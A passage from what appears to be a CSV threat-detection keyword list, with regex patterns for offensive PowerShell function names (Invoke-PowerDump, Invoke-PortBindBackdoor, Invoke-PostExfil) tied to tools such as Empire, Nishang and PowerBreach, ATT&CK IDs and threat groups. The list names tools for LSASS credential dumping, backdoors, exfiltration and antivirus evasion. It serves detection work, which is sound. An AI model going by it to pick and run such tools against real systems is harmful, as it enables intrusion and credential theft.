Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49285"
"*Invoke-PhishingLNK.ps1*",".{0,1000}Invoke\-PhishingLNK\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49286"
"*Invoke-PingSweep *",".{0,1000}Invoke\-PingSweep\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","49287"
"*invoke-pipekat *",".{0,1000}invoke\-pipekat\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49288"
"*Invoke-Piper*",".{0,1000}Invoke\-Piper.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","49289"
"*Invoke-PiperClient*",".{0,1000}Invoke\-PiperClient.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","49290"
"*Invoke-PiperServer*",".{0,1000}Invoke\-PiperServer.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","49291"
"*Invoke-PipeShell.ps1*",".{0,1000}Invoke\-PipeShell\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49292"
"*Invoke-PortBind*",".{0,1000}Invoke\-PortBind.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerBreach.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49293"
"*Invoke-PortBindBackdoor*",".{0,1000}Invoke\-PortBindBackdoor.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49294"
"*Invoke-PortFwd *",".{0,1000}Invoke\-PortFwd\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49295"
"*Invoke-PortFwd.ps1*",".{0,1000}Invoke\-PortFwd\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49296"
"*Invoke-PortKnockBackdoor*",".{0,1000}Invoke\-PortKnockBackdoor.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49297"
"*Invoke-Portscan*",".{0,1000}Invoke\-Portscan.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49298"
"*Invoke-PortScan*",".{0,1000}Invoke\-PortScan.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49299"
"*Invoke-Portscan*",".{0,1000}Invoke\-Portscan.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-Portscan.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49300"
"*Invoke-PortScan*",".{0,1000}Invoke\-PortScan.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49301"
"*Invoke-Portscan*",".{0,1000}Invoke\-Portscan.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49302"
"*Invoke-PortScan*",".{0,1000}Invoke\-PortScan.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49303"
"*Invoke-Portscan.ps1*",".{0,1000}Invoke\-Portscan\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49304"
"*Invoke-Portscan.ps1*",".{0,1000}Invoke\-Portscan\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1081","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49305"
"*Invoke-PoshRatHttp*",".{0,1000}Invoke\-PoshRatHttp.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49306"
"*Invoke-PoshRatHttp*",".{0,1000}Invoke\-PoshRatHttp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49307"
"*Invoke-PoshRatHttp*",".{0,1000}Invoke\-PoshRatHttp.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49308"
"*Invoke-PoshRatHttps*",".{0,1000}Invoke\-PoshRatHttps.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49309"
"*Invoke-PoshRatHttps*",".{0,1000}Invoke\-PoshRatHttps.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49310"
"*Invoke-PostDump*",".{0,1000}Invoke\-PostDump.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49311"
"*Invoke-PostExfil*",".{0,1000}Invoke\-PostExfil.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PostExfil.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49312"
"*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49313"
"*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49314"
"*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49315"
"*Invoke-PowerDump.ps1*",".{0,1000}Invoke\-PowerDump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49316"
"*Invoke-PowerExtract*",".{0,1000}Invoke\-PowerExtract.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","49317"
